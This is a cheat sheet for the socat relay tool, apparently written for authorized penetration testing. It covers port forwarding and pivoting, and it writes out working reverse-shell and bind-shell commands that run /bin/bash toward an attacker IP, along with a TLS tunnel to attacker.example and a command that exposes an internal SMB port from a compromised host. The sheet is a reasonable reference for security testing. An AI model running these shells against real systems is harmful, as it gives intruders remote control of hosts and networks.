socat Cheat Sheet
Bidirectional data relay for shells, port forwarding, and protocol bridging on authorized networks.
Overview
socat creates relays between sockets, ptys, and files—more flexible than netcat for stable shells, port forwarding, and TLS tunnels during authorized internal testing.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
sudo apt install -y socatEssential commands
Listen and forward to remote service
socat TCP-LISTEN:8080,fork TCP:internal.host:80Reverse shell listener
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,saneCommon workflows
Stable reverse shell (attacker) —
socat file:`tty`,raw,echo=0 TCP-LISTEN:4444Target
socat TCP:10.10.14.5:4444 EXEC:/bin/bash,pty,stderr,setsid,sigint,saneForward local 1080 to internal RDP
socat TCP-LISTEN:1080,fork TCP:10.10.10.50:3389On compromised host — expose internal 445 to attacker 8445
socat TCP:10.10.14.5:8445 TCP:127.0.0.1:445UDP DNS relay —
socat UDP4-LISTEN:53,fork UDP4:8.8.8.8:53Generate cert once, then:
socat OPENSSL-LISTEN:443,cert=server.pem,key=server.pem,verify=0,fork TCP:127.0.0.1:22socat OPENSSL:attacker.example:443,verify=0 TCP:127.0.0.1:22Flags reference
TCP-LISTEN:port | Listen TCP |
|---|---|
TCP:host:port | Connect TCP |
UDP4-LISTEN:port | Listen UDP |
fork | Handle multiple clients |
reuseaddr | Reuse bind address |
EXEC:cmd | Run command |
pty | Pseudo-TTY for shell |
OPENSSL-LISTEN / OPENSSL | TLS listener/client |
cert=,key= | TLS certificate files |
verify=0 | Skip cert verify (testing only) |
Tips
- pty,stderr,setsid,sigint,sane produces usable interactive shells over socat.
- Use fork on listeners for multiple connections during pivoting.
- Prefer socat over nc when you need OPENSSL or reliable double connections.
- Document open relays; close listeners after engagement phase.